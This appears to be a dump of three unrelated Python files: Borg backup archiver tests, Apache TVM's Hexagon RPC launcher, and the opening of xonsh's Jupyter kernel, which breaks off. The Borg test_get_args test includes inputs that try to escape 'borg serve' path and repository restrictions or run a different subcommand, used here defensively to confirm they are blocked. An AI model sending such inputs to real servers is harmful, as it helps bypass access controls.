# Find ID of test1 so we can corrupt it later :)
target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
self.cmd('create', self.repository_location + '::test2', 'input')
# Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('info', self.repository_location, '--json')
chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
assert len(os.listdir(chunks_archive)) == 4 # two archives, one chunks cache and one .integrity file each
self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
# Trigger cache sync by changing the manifest ID in the cache config
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
# Cache sync notices corrupted archive chunks, but automatically recovers.
out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
assert 'Reading cached archive chunk index for test1' in out
assert 'Cached archive chunk index of test1 is corrupted' in out
assert 'Fetching and building archive index for test1' in out
def test_old_version_interfered(self):
# Modify the main manifest ID without touching the manifest ID in the integrity section.
# This happens if a version without integrity checking modifies the cache.
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
out = self.cmd('info', self.repository_location)
assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
# Setup files for the first snapshot
self.create_regular_file('empty', size=0)
self.create_regular_file('file_unchanged', size=128)
self.create_regular_file('file_removed', size=256)
self.create_regular_file('file_removed2', size=512)
self.create_regular_file('file_replaced', size=1024)
os.mkdir('input/dir_replaced_with_file')
os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
os.mkdir('input/dir_removed')
if are_symlinks_supported():
os.mkdir('input/dir_replaced_with_link')
os.symlink('input/dir_replaced_with_file', 'input/link_changed')
os.symlink('input/file_unchanged', 'input/link_removed')
os.symlink('input/file_removed2', 'input/link_target_removed')
os.symlink('input/empty', 'input/link_target_contents_changed')
os.symlink('input/empty', 'input/link_replaced_by_file')
if are_hardlinks_supported():
os.link('input/file_replaced', 'input/hardlink_target_replaced')
os.link('input/empty', 'input/hardlink_contents_changed')
os.link('input/file_removed', 'input/hardlink_removed')
os.link('input/file_removed2', 'input/hardlink_target_removed')
self.cmd('init', '--encryption=repokey', self.repository_location)
# Create the first snapshot
self.cmd('create', self.repository_location + '::test0', 'input')
# Setup files for the second snapshot
self.create_regular_file('file_added', size=2048)
self.create_regular_file('file_empty_added', size=0)
os.unlink('input/file_replaced')
self.create_regular_file('file_replaced', contents=b'0' * 4096)
os.unlink('input/file_removed')
os.unlink('input/file_removed2')
os.rmdir('input/dir_replaced_with_file')
self.create_regular_file('dir_replaced_with_file', size=8192)
os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
os.mkdir('input/dir_added')
os.rmdir('input/dir_removed')
if are_symlinks_supported():
os.rmdir('input/dir_replaced_with_link')
os.symlink('input/dir_added', 'input/dir_replaced_with_link')
os.unlink('input/link_changed')
os.symlink('input/dir_added', 'input/link_changed')
os.symlink('input/dir_added', 'input/link_added')
os.unlink('input/link_replaced_by_file')
self.create_regular_file('link_replaced_by_file', size=16384)
os.unlink('input/link_removed')
if are_hardlinks_supported():
os.unlink('input/hardlink_removed')
os.link('input/file_added', 'input/hardlink_added')
with open('input/empty', 'ab') as fd:
fd.write(b'appended_data')
# Create the second snapshot
self.cmd('create', self.repository_location + '::test1a', 'input')
self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
def do_asserts(output, can_compare_ids):
# File contents changed (deleted and replaced with a new file)
change = 'B' if can_compare_ids else '{:<19}'.format('modified')
assert 'file_replaced' in output # added to debug #3494
assert '{} input/file_replaced'.format(change) in output
# File unchanged
assert 'input/file_unchanged' not in output
# Directory replaced with a regular file
if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
# Basic directory cases
assert 'added directory input/dir_added' in output
assert 'removed directory input/dir_removed' in output
if are_symlinks_supported():
# Basic symlink cases
assert 'changed link input/link_changed' in output
assert 'added link input/link_added' in output
assert 'removed link input/link_removed' in output
# Symlink replacing or being replaced
assert '] input/dir_replaced_with_link' in output
assert '] input/link_replaced_by_file' in output
# Symlink target removed. Should not affect the symlink at all.
assert 'input/link_target_removed' not in output
# The inode has two links and the file contents changed. Borg
# should notice the changes in both links. However, the symlink
# pointing to the file is not changed.
change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
assert '{} input/empty'.format(change) in output
if are_hardlinks_supported():
assert '{} input/hardlink_contents_changed'.format(change) in output
if are_symlinks_supported():
assert 'input/link_target_contents_changed' not in output
# Added a new file and a hard link to it. Both links to the same
# inode should appear as separate files.
assert 'added 2.05 kB input/file_added' in output
if are_hardlinks_supported():
assert 'added 2.05 kB input/hardlink_added' in output
# check if a diff between non-existent and empty new file is found
assert 'added 0 B input/file_empty_added' in output
# The inode has two links and both of them are deleted. They should
# appear as two deleted files.
assert 'removed 256 B input/file_removed' in output
if are_hardlinks_supported():
assert 'removed 256 B input/hardlink_removed' in output
# Another link (marked previously as the source in borg) to the
# same inode was removed. This should not change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_removed' not in output
# Another link (marked previously as the source in borg) to the
# same inode was replaced with a new regular file. This should not
# change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_replaced' not in output
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
# We expect exit_code=1 due to the chunker params warning
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
def test_sort_option(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('a_file_removed', size=8)
self.create_regular_file('f_file_removed', size=16)
self.create_regular_file('c_file_changed', size=32)
self.create_regular_file('e_file_changed', size=64)
self.cmd('create', self.repository_location + '::test0', 'input')
os.unlink('input/a_file_removed')
os.unlink('input/f_file_removed')
os.unlink('input/c_file_changed')
os.unlink('input/e_file_changed')
self.create_regular_file('c_file_changed', size=512)
self.create_regular_file('e_file_changed', size=1024)
self.create_regular_file('b_file_added', size=128)
self.create_regular_file('d_file_added', size=256)
self.cmd('create', self.repository_location + '::test1', 'input')
output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
expected = [
'a_file_removed',
'b_file_added',
'c_file_changed',
'd_file_added',
'e_file_changed',
'f_file_removed',
]
assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
archiver = Archiver()
# everything normal:
# first param is argv as produced by ssh forced command,
# second param is like from SSH_ORIGINAL_COMMAND env variable
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --info --umask=0027')
assert args.func == archiver.do_serve
assert args.restrict_to_paths == ['/p1', '/p2']
assert args.umask == 0o027
assert args.log_level == 'info'
# similar, but with --restrict-to-repository
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --info --umask=0027')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break out of path restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --restrict-to-path=/')
assert args.restrict_to_paths == ['/p1', '/p2']
# trying to cheat - break out of repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break below repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/r1/below')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - try to execute different subcommand
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg init --encryption=repokey /')
assert args.func == archiver.do_serve
# Check that environment variables in the forced command don't cause issues. If the command
# were not forced, environment variables would be interpreted by the shell, but this does not
# happen for forced commands - we get the verbatim command line and need to deal with env vars.
args = archiver.get_args(['borg', 'serve', ],
'BORG_FOO=bar borg serve --info')
assert args.func == archiver.do_serve
def test_chunk_content_equal():
def ccc(a, b):
chunks_a = [data for data in a]
chunks_b = [data for data in b]
compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
assert compare1 == compare2
return compare1
assert ccc([
b'1234', b'567A', b'bC'
], [
b'1', b'23', b'4567A', b'b', b'C'
])
# one iterator exhausted before the other
assert not ccc([
b'12345',
], [
b'1234', b'56'
])
# content mismatch
assert not ccc([
b'1234', b'65'
], [
b'1234', b'56'
])
# first is the prefix of second
assert not ccc([
b'1234', b'56'
], [
b'1234', b'565'
])
class TestBuildFilter:
@staticmethod
def peek_and_store_hardlink_masters(item, matched):
pass
def test_basic(self):
matcher = PatternMatcher()
matcher.add([parse_pattern('included')], IECommand.Include)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='included'))
assert filter(Item(path='included/file'))
assert not filter(Item(path='something else'))
def test_empty(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='anything'))
def test_strip_components(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
assert not filter(Item(path='shallow'))
assert not filter(Item(path='shallow/')) # can this even happen? paths are normalized...
assert filter(Item(path='deep enough/file'))
assert filter(Item(path='something/dir/file'))
class TestCommonOptions:
@staticmethod
def define_common_options(add_common_option):
add_common_option('-h', '--help', action='help', help='show this help message and exit')
add_common_option('--critical', dest='log_level', help='foo',
action='store_const', const='critical', default='warning')
add_common_option('--error', dest='log_level', help='foo',
action='store_const', const='error', default='warning')
add_common_option('--append', dest='append', help='foo',
action='append', metavar='TOPIC', default=[])
add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
help='(default: %(default)d).')
@pytest.fixture
def basic_parser(self):
parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
parser.common_options = Archiver.CommonOptions(self.define_common_options,
suffix_precedence=('_level0', '_level1'))
return parser
@pytest.fixture
def subparsers(self, basic_parser):
if sys.version_info >= (3, 7):
# py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
else:
# py36 does not support required=... argument (but behaves like required=False).
# note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
@pytest.fixture
def parser(self, basic_parser):
basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
return basic_parser
@pytest.fixture
def common_parser(self, parser):
common_parser = argparse.ArgumentParser(add_help=False, prog='test')
parser.common_options.add_common_group(common_parser, '_level1')
return common_parser
@pytest.fixture
def parse_vars_from_line(self, parser, subparsers, common_parser):
subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
description='foo', epilog='bar', help='baz',
formatter_class=argparse.RawDescriptionHelpFormatter)
subparser.set_defaults(func=1234)
subparser.add_argument('--append-only', dest='append_only', action='store_true')
def parse_vars_from_line(*line):
print(line)
args = parser.parse_args(line)
parser.common_options.resolve(args)
return vars(args)
return parse_vars_from_line
def test_simple(self, parse_vars_from_line):
assert parse_vars_from_line('--error') == {
'append': [],
'lock_wait': 1,
'log_level': 'error',
'progress': False
}
assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
'append': [],
'lock_wait': 1,
'log_level': 'critical',
'progress': False,
'append_only': False,
'func': 1234,
}
with pytest.raises(SystemExit):
parse_vars_from_line('--append-only', 'subcommand')
assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
'append': ['foo', 'bar', 'baz'],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
@pytest.mark.parametrize('position', ('before', 'after', 'both'))
@pytest.mark.parametrize('flag,args_key,args_value', (
('-p', 'progress', True),
('--lock-wait=3', 'lock_wait', 3),
))
def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
line = []
if position in ('before', 'both'):
line.append(flag)
line.append('subcommand')
if position in ('after', 'both'):
line.append(flag)
result = {
'append': [],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
result[args_key] = args_value
assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
assert parse_storage_quota('50M') == 50 * 1000**2
with pytest.raises(argparse.ArgumentTypeError):
parse_storage_quota('5M')
def get_all_parsers():
"""
Return dict mapping command to parser.
"""
parser = Archiver(prog='borg').build_parser()
borgfs_parser = Archiver(prog='borgfs').build_parser()
parsers = {}
def discover_level(prefix, parser, Archiver, extra_choices=None):
choices = {}
for action in parser._actions:
if action.choices is not None and 'SubParsersAction' in str(action.__class__):
for cmd, parser in action.choices.items():
choices[prefix + cmd] = parser
if extra_choices is not None:
choices.update(extra_choices)
if prefix and not choices:
return
for command, parser in sorted(choices.items()):
discover_level(command + " ", parser, Archiver)
parsers[command] = parser
discover_level("", parser, Archiver, {'borgfs': borgfs_parser})
return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
if isinstance(parser.epilog, RstToTextLazy):
assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
assert str(rst_to_terminal(helptext))
|
build.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines top-level glue functions for building Hexagon."""
import abc
import datetime
import multiprocessing as mp
import os
import pathlib
import signal
import stat
import subprocess
from typing import Union
import tvm
from ..._ffi import libinfo
from .session import Session
HEXAGON_RPC_LIB_DIR = os.environ.get("HEXAGON_RPC_LIB_DIR")
def _get_hexagon_rpc_lib_dir() -> pathlib.Path:
"""Find the Hexagon API binaries.
Returns
-------
pathlib.Path :
The path to the Hexagon API directory.
"""
global HEXAGON_RPC_LIB_DIR
if HEXAGON_RPC_LIB_DIR is None:
for path in libinfo.find_lib_path():
rpc_dir = os.path.join(os.path.dirname(path), "hexagon_api_output")
if os.path.isdir(rpc_dir):
HEXAGON_RPC_LIB_DIR = rpc_dir
break
else:
raise RuntimeError("hexagon_api binaries not found, please define HEXAGON_RPC_LIB_DIR")
return pathlib.Path(HEXAGON_RPC_LIB_DIR)
def _get_test_directory_name() -> str:
"""Generate a time-stamped name for use as a test directory name."""
return datetime.datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
class HexagonLauncherRPC(metaclass=abc.ABCMeta):
"""Base class for RPC-based launchers.
This is an abstract class intended to be a base class for specific
implementations of RPC launchers. There are two public methods that
each launcher needs to implement:
- start_server
- stop server
and two "private" methods used in setting up the environment:
- _copy_to_remote
- _create_remote_directory
The basic flow of interaction with the launcher is
launcher = HexagonLauncher(...)
launcher.start_server()
with launcher.start_session() as session:
# Do something with the session
launcher.stop_server()
"""
HEXAGON_REMOTE_DEVICE_KEY = "hexagon-dev"
"""Configure HexagonLauncherRPC.
Parameters
----------
rpc_info : dict
Description of the RPC setup. Recognized keys:
"rpc_tracker_host" : str name of the host running the tracker (default "0.0.0.0")
"rpc_tracker_port" : int port number of the tracker (default: 9190)
"rpc_server_port" : int port number for the RPC server to use (default 7070)
"workspace_base" : str name of base test directory (default ".")
workspace : str or patlib.Path
The server's remote working directory. If this directory does not
exist, it will be created. If it does exist, the servermust have
write permissions to it.
If this parameter is None, a subdirectory in the `workspace_base`
directory will be created, otherwise the `workspace_base` is not
used.
"""
def __init__(self, rpc_info: dict, workspace: Union[str, pathlib.Path] = None):
self._rpc_info = {
"rpc_tracker_host": "0.0.0.0",
"rpc_tracker_port": 9190,
"rpc_server_port": 7070,
"workspace_base": ".",
}
self._rpc_info.update(rpc_info)
self._workspace = self._create_workspace(workspace)
@abc.abstractmethod
def start_server(self):
"""Start the RPC server"""
...
@abc.abstractmethod
def stop_server(self):
"""Stop the RPC server"""
...
@abc.abstractmethod
def _copy_to_remote(
self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
):
"""Copy a local file to a remote location.
Parameters
----------
local_path : str or pathlib.Path
Path to the local file.
remote_path : str or pathlib.Path
Path to the remote file (to be written).
"""
...
@abc.abstractmethod
def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
"""Create a directory in the remote location.
Parameters
----------
remote_path : str or pathlib.Path
Name of the directory to be created.
"""
...
def _create_workspace(self, workspace: Union[str, pathlib.Path]) -> pathlib.Path:
"""Create a working directory for the server.
Parameters
----------
workspace : str or pathlib.Path or NoneType
Name of the directory to create. If None, a new name is constructed
using workspace_base.
Returns
-------
pathlib.Path :
Created workspace.
"""
if not workspace:
base_dir = self._rpc_info["workspace_base"]
workspace = os.path.join(base_dir, _get_test_directory_name())
self._create_remote_directory(workspace)
return pathlib.Path(workspace)
def upload(self, local_path: Union[str, pathlib.Path], remote_filename: str):
"""Upload a local file to the remote workspace.
Parameters
----------
local_path : str or pathlib.Path
Path to the local file to be copied.
remote_filename : str
Name of the file in the remote workspace.
"""
assert self._workspace
self._copy_to_remote(local_path, os.path.join(str(self._workspace), remote_filename))
def start_session(self) -> Session:
"""Connect to the RPC server.
Returns
-------
Session :
The session object.
"""
hexagon_remote_kw = {
"host": self._rpc_info["rpc_tracker_host"],
"port": self._rpc_info["rpc_tracker_port"],
"priority": 0,
"timeout": 0,
"key": self.HEXAGON_REMOTE_DEVICE_KEY,
}
return Session(hexagon_remote_kw)
def load_module(self, module_name: Union[str, pathlib.Path], session: Session):
"""Load TVM module.
Parameters
----------
module_name : str or pathlib.Path
Name of the module to load. It must be either a bare file name
(without any path components), or a full path in the remote
system. If it is a file name, the file must be placed in the
remote workspace.
session : Session
Remote session. The session must be established (via __enter__)
prior to calling this function.
Returns
-------
TVMModule :
TVM module object.
"""
return session.load_module(module_name)
def get_graph_executor(
self, graph_json: str, module_name: Union[str, pathlib.Path], session: Session
):
"""Create a local GraphModule which consumes a remote libmod.
Parameters
----------
graph_json : str
The string with the graph JSON.
module_name : str or pathlib.Path
Remote module filename. Same restrictions apply as in load_module().
session : Session
Remote session. The session must be established (via __enter__)
prior to calling this function.
Returns
-------
GraphModule :
Runtime graph module that can be used to execute the graph.
"""
graph_mod = self.load_module(module_name, session)
return tvm.contrib.graph_executor.create(graph_json, graph_mod, session.device)
def get_aot_executor(self, module_name: Union[str, pathlib.Path], session: Session):
"""Create a local AoTModule which consumes a remote libmod.
Parameters
----------
module_name : str or pathlib.Path
Remote module filename. Same restrictions apply as in load_module().
session : Session
Remote session. The session must be established (via __enter__)
prior to calling this function.
Returns
-------
aot_module : AotModule
Runtime AOT module that can be used to execute.
"""
aot_mod = self.load_module(module_name, session)
return tvm.runtime.executor.AotModule(aot_mod["default"](session.device))
class HexagonLauncherAndroid(HexagonLauncherRPC):
"""Hexagon Launcher for Android."""
ANDROID_HEXAGON_TEST_BASE_DIR = pathlib.Path("/data/local/tmp/hexagon_test")
ANDROID_HEXAGON_RPC_FILES = [
"android_bash.sh",
"libhexagon_rpc_skel.so",
"libtvm_runtime.so",
"tvm_rpc_android",
]
def __init__(
self,
serial_number: str,
rpc_info: dict,
workspace: Union[str, pathlib.Path] = None,
):
"""Configure a new HexagonLauncherAndroid
Parameters
----------
serial_number : str
Android device serial number.
rpc_info : dict
Same as in HexagonLauncherRPC, except if the "workspace_base"
key is not present or is None, ANDROID_HEXAGON_TEST_BASE_DIR
is used as the base directory.
workspace : str or pathlib.Path, optional
Test workspace path on android.
"""
if not rpc_info.get("workspace_base"):
rpc_info["workspace_base"] = self.ANDROID_HEXAGON_TEST_BASE_DIR
self._serial_number = serial_number
adb_socket = rpc_info["adb_server_socket"] if rpc_info["adb_server_socket"] else "tcp:5037"
self._adb_device_sub_cmd = ["adb", "-L", adb_socket, "-s", self._serial_number]
super(HexagonLauncherAndroid, self).__init__(rpc_info, workspace)
def _copy_to_remote(
self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
subprocess.check_call(
self._adb_device_sub_cmd + ["push", str(local_path), str(remote_path)]
)
def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
subprocess.check_call(self._adb_device_sub_cmd + ["shell", "mkdir", "-p", str(remote_path)])
def _copy_binaries(self):
"""Upload Android server binaries."""
# Create bash script
android_bash_script_path = _get_hexagon_rpc_lib_dir() / "android_bash.sh"
with open(_get_hexagon_rpc_lib_dir() / "android_bash.sh.template", "r") as src_f:
if os.path.exists(android_bash_script_path):
os.remove(android_bash_script_path)
with open(android_bash_script_path, "w") as dest_f:
for line in src_f.readlines():
if "<RPC_TRACKER_HOST>" in line:
line = line.replace(
"<RPC_TRACKER_HOST>", str(self._rpc_info["rpc_tracker_host"])
)
if "<RPC_TRACKER_PORT>" in line:
line = line.replace(
"<RPC_TRACKER_PORT>", str(self._rpc_info["rpc_tracker_port"])
)
if "<HEXAGON_REMOTE_DEVICE_KEY>" in line:
line = line.replace(
"<HEXAGON_REMOTE_DEVICE_KEY>", self.HEXAGON_REMOTE_DEVICE_KEY
)
if "<RPC_SERVER_PORT>" in line:
line = line.replace(
"<RPC_SERVER_PORT>", str(self._rpc_info["rpc_server_port"])
)
dest_f.write(line)
# Make shell script executable
android_bash_stat = os.stat(android_bash_script_path)
os.chmod(android_bash_script_path, android_bash_stat.st_mode | stat.S_IEXEC)
# Push files
lib_dir = _get_hexagon_rpc_lib_dir()
for item in self.ANDROID_HEXAGON_RPC_FILES:
self._copy_to_remote(lib_dir / item, self._workspace / item)
def _run_server_script(self):
"""Setup the ADB connection and execute the server script."""
# Removed pre-defined forward/reverse rules
subprocess.check_call(self._adb_device_sub_cmd + ["forward", "--remove-all"])
subprocess.check_call(self._adb_device_sub_cmd + ["reverse", "--remove-all"])
# Enable port reverse for RPC tracker
rpc_tracker_port = self._rpc_info["rpc_tracker_port"]
rpc_server_port = self._rpc_info["rpc_server_port"]
subprocess.check_call(
self._adb_device_sub_cmd
+ ["reverse", f"tcp:{rpc_tracker_port}", f"tcp:{rpc_tracker_port}"]
)
# Enable port forward for RPC server. We forward 9 ports after the rpc_server_port.
for i in range(0, 10):
subprocess.check_call(
self._adb_device_sub_cmd
+ ["forward", f"tcp:{rpc_server_port+i}", f"tcp:{rpc_server_port+i}"]
)
# Run server and connect to tracker
subprocess.Popen(
self._adb_device_sub_cmd + ["shell", f"cd {self._workspace} && ./android_bash.sh"],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def start_server(self):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
self._copy_binaries()
self._run_server_script()
def stop_server(self):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
# Kill process children
subprocess.Popen(
self._adb_device_sub_cmd + ["shell", f"pkill -P `cat {self._workspace}/rpc_pid.txt`"]
)
# Kill main process
subprocess.Popen(
self._adb_device_sub_cmd + ["shell", f"kill `cat {self._workspace}/rpc_pid.txt`"]
)
class HexagonLauncherSimulator(HexagonLauncherRPC):
"""Hexagon Launcher for Hexagon simulator."""
SIMULATOR_HEXAGON_RPC_FILES = ["tvm_rpc_x86", "libhexagon_rpc_sim.so"]
def __init__(self, rpc_info: dict, workspace: Union[str, pathlib.Path] = None):
"""Configure a new HexagonLauncherSimulator
Parameters are same as for HexagonLauncherRPC.
"""
super(HexagonLauncherSimulator, self).__init__(rpc_info, workspace)
self._toolchain = os.environ.get("HEXAGON_TOOLCHAIN")
if not self._toolchain:
raise RuntimeError("Please set HEXAGON_TOOLCHAIN env variable")
def _copy_to_remote(
self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
subprocess.check_call(["cp", str(local_path), str(remote_path)])
def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
subprocess.check_call(["mkdir", "-p", str(remote_path)])
def _copy_libcxx(self, dest_dir: Union[str, pathlib.Path]):
"""Copy libc++ libraries to the remote workspace."""
# Copy the v68 versions, since we don't have target information.
# The v68 ones should work everywhere on v68+.
lib_dir = os.path.join(self._toolchain, "target/hexagon/lib/v68/G0/pic")
libcxx_files = []
for entry in os.scandir(lib_dir):
if entry.is_dir() or entry.name.find(".so") == -1:
continue
if entry.name.startswith("libc++"):
libcxx_files.append(entry.name)
# Use tar to preserve the symbolic links. Libc++ libraries use the
# typical .so versioning, so that libc++.so may be a symlink to
# something else. Also, shared libraries using libc++ could be
# directly linked against some version, e.g. libc++.so.1, so make
# sure that all files are copied over. The preservation of symbolic
# links is to save disk space.
tar_in = f"tar -cf - -C {lib_dir} " + " ".join(libcxx_files)
tar_out = f"tar -xf - -C {str(dest_dir)}"
subprocess.check_call(tar_in + " | " + tar_out, shell=True)
def start_server(self):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
# Copy binaries
lib_dir = _get_hexagon_rpc_lib_dir()
for item in self.SIMULATOR_HEXAGON_RPC_FILES:
self._copy_to_remote(lib_dir / item, self._workspace / item)
# Copy libc++ from the toolchain to the workspace
self._copy_libcxx(self._workspace)
rpc_tracker_host = self._rpc_info["rpc_tracker_host"]
rpc_tracker_port = self._rpc_info["rpc_tracker_port"]
rpc_server_port = self._rpc_info["rpc_server_port"]
server_exe = os.path.join(".", "tvm_rpc_x86")
args = [
"server",
f"--tracker={rpc_tracker_host}:{rpc_tracker_port}",
f"--port={rpc_server_port}",
f"--key={self.HEXAGON_REMOTE_DEVICE_KEY}",
"--timeout=0",
]
# pylint: disable=unused-argument
def _terminate_handler(self, signum, *rest):
# Terminate the Popen'ed (sub)process.
os.kill(self._subprocess_pid, signal.SIGTERM)
def _start(self):
# This function will be running in a new process. It will start the RPC
# (x86) server as a subprocess of itself.
log_out = self._workspace / "stdout.txt"
log_err = self._workspace / "stderr.txt"
# Intercept the TERM signal so we can also terminate the subprocess.
signal.signal(signal.SIGTERM, lambda *a: _terminate_handler(self, *a))
with open(log_out, "w") as out, open(log_err, "w") as err:
p = subprocess.Popen(
[server_exe, *args], stdout=out, stderr=err, cwd=self._workspace
)
# Insert the pid of the subprocess in the self object.
self._subprocess_pid = p.pid
p.wait()
self._server_process = mp.Process(target=lambda *a: _start(self, *a))
self._server_process.start()
def stop_server(self):
"""Abstract method implementation. See description in HexagonLauncherRPC."""
self._server_process.terminate()
# pylint: disable=invalid-name
def HexagonLauncher(
serial_number: str,
rpc_info: dict,
workspace: Union[str, pathlib.Path] = None,
):
if serial_number == "simulator":
return HexagonLauncherSimulator(rpc_info, workspace)
return HexagonLauncherAndroid(serial_number, rpc_info, workspace)
|
jupyter_kernel.py | # -*- coding: utf-8 -*-
"""Hooks for Jupyter Xonsh Kernel."""
import sys
import json
import hmac
import uuid
import errno
import hashlib
import datetime
import builtins
import threading
from pprint import pformat
from argparse import ArgumentParser
from collections.abc import Set
import zmq
from zmq.eventloop import ioloop, zmqstream
from zmq.error import ZMQError
from xonsh import __version__ as version
from xonsh.main import setup
from xonsh.completer import Completer
from xonsh.commands_cache import predict_true
MAX_SIZE = 8388608 # 8 Mb
DELIM = b"<IDS|MSG>"
def dump_bytes(*args, **kwargs):
"""Converts an object to JSON and returns the bytes."""
return json.dumps(*args, **kwargs).encode("ascii")
def load_bytes(b):
"""Converts bytes of JSON to an object."""
return json.loads(b.decode("ascii"))
def bind(socket, connection, port):
"""Binds a socket to a port, or a random port if needed. Returns the port."""
if port <= 0:
return socket.bind_to_random_port(connection)
else:
socket.bind("{}:{}".format(connection, port))
return port
class XonshKernel:
"""Xonsh xernal for Jupyter"""
implementation = "Xonsh " + version
implementation_version = version
language = "xonsh"
language_version = version.split(".")[:3]
banner = "Xonsh - Python-powered, cross-platform shell"
language_info = {
"name": "xonsh",
"version": version,
"pygments_lexer": "xonsh",
"codemirror_mode": "shell",
"mimetype": "text/x-sh",
"file_extension": ".xsh",
}
signature_schemes = {"hmac-sha256": hashlib.sha256}
def __init__(self, debug_level=0, session_id=None, config=None, **kwargs):
"""
Parameters
----------
debug_level : int, optional
Integer from 0 (no debugging) to 3 (all debugging), default: 0.
session_id : str or None, optional
Unique string id representing the kernel session. If None, this will
be replaced with a random UUID.
config : dict or None, optional
Configuration dictionary to start server with. BY default will
search the command line for options (if given) or use default
configuration.
"""
self.debug_level = debug_level
self.session_id = str(uuid.uuid4()) if session_id is None else session_id
self._parser = None
self.config = self.make_default_config() if config is None else config
self.exiting = False
self.execution_count = 1
self.completer = Completer()
@property
def parser(self):
if self._parser is None:
p = ArgumentParser("jupyter_kerenel")
